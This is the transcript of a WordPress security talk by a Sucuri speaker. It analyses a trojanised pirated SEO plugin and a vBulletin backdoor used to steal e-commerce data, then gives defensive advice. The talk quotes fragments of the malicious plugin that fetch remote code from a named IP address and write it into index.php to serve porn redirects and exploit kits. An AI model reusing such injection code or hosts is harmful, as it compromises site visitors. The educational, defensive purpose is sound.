WordPress Security - Learning From Hacks

Learning From Website Hacks

WordPress Security

Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox

This is me!

o Sucuri Inc.o Website Securityo Incident Handlingo Log Analysis


Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.

Let’s Learn from Website Attacks


Attack Scenerios

o The Art of Phishing

o Stealing Credit Cards

Scenerio Uno (One)

The art of Phishing Naive Users


Attack of Opportunity

o Holiday season / Holiday spirit

o Did you say Free?


Red Flag[s]

<A href="http://www.[infecteddomain].com.au/wp-content/all-in-one-seo-pack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>

Red Alert: http://www.[infecteddomain].com.au


Difference

o Pro Version?o Legit Version?

Modified file: aioseop_class.php


Intent

oRedirection - porn or exploit kits

oTarget: index.php

oTaking content from here:$code_txt = 'http://91.239.15.61/o1.txt’;

oPlacing it in the files here:$index_path = $path.'/index.php';

if(file_put_contents($index_path, $code)){


How?

o Index.php payload:

oUsing curl to pull content from here:$url = http://91.239.15.61/java/google.php;


Payload

oPulls content from: http://91.239.15.61/google.js - Redirection to Porn Sites

http://91.239.15.61/g.php - Exploit Kits


Lesson to Be Learned

o Trust but verify sources

o This is not isolated to just plugins, it can happen to themes as well

o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!

o The vulnerability was the website administrator…

Scenerio Dos (Two)

Got e-Commerce? Leverage 3rd-party CMS applications in your

stack?


Got e-Commerce?

o Business owners <3 E-commerce

o CMS extensibility = WooCommerce o Quick setup of payment collection systems for

goods

o Awesome, right?


Big Target

o Credit Card = Cha-Ching

o Used/shared/sold underground

o Impact is catastrophico Blacklistingo Ban

o No more cash flow! No more Trust!


Cross-contamination

Simple concept in which your website is attacked and infected by a neighboring site in the same

environment


vBulletin

o Popular CMS Application for Forums

o WordPress + vBulletin Configurations Common


Scenerio

o WordPress: Main website | Blog | e-Commerce

o vBulletin: Forum

o 1 Server


Payload

Found here: /wp-admin/includes/list.php


How?

o It’s about the journey folks…


Scenerio

o list.php?

o shop.txt?


That’s Interesting

/forum/ajax.php?edit=


vBulletin Plugin

o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation.


Dump of Users


Attack Vector

o Access Control


Lessons to be Learned

o Attackers are smart – surprise!!!

o Cross-contamination is a real threat today!

o Must be diligent across our stack!

o Isolate applications if possible.

What can you do?

Lets get proactive!


None of the security plugins out there would have prevented either of these attacks. So much

for all those hardening tips..

Harsh Reality


Two Important Vectors

o Access controlo Within your control…

o Software vulnerabilitieso Not so much…


• There is no single cure

• Layered Defenses

• Combination of tools and actions– Combine: Protection and Detection

Defense in Depth


Access Control

o Google Authenticator – 2FA

o http://wordpress.org/plugins/google-authenticator/

o Duo Security – 2FA

o http://wordpress.org/plugins/duo-wordpress/

o Login Secure Solutions – Policy / Enforcement

o http://wordpress.org/plugins/login-security-solution/

o Sucuri CloudProxy / Detection / Remedation - Complete Website Security

o http://sucuri.net/signup

http://wordpress.org/plugins/google-authenticator/

http://wordpress.org/plugins/duo-wordpress/

http://wordpress.org/plugins/login-security-solution/

http://sucuri.net/signup


Software Vulnerabilities

o Trusted Sourceso Start with the repo and established communitieso If you’re not a developer this is going to be beyond your

reach mostly

o Web Application Firewall (WAF) Pluginso Highly ineffective, evading and bypassing is easy o Cause Denial of Service attacks

o SaaS based Web Application Firewall (WAF) more effective!o Sucuri CloudProxy WAF


• Know what is going on with your site– Integrity Checks– Logging in / Logging out– Changes being made

• More important than half the hardening tips you read on line today

• Options:– WP Security Audit log http

://wordpress.org/plugins/wp-security-audit-log/

– Sucuri Premium Pluginhttp://wordpress.sucuri.net

Auditing

http://wordpress.org/plugins/wp-security-audit-log/



http://wordpress.sucuri.net/


If all else fails…

o Be sure you have backups… o VaultPress – WordPress Siteso Sucuri Backups – WordPress and Everything else

o SaaS based Backups more effective!


Tony Perez @perezbox | @sucuri_security

[email protected]#wordsesh

mailto:[email protected]

WordPress Security - Learning From Hacks

Education

Transcript of WordPress Security - Learning From Hacks